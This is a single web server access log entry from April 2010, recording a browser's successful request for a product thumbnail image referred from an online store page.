139.168.143.136 - - [16/Apr/2010:01:17:45 -0400] "GET /images/items/CALCIUMSULFATE_THUMB.JPG HTTP/1.1" 200 2715 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L8274F2509589B0004287052+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
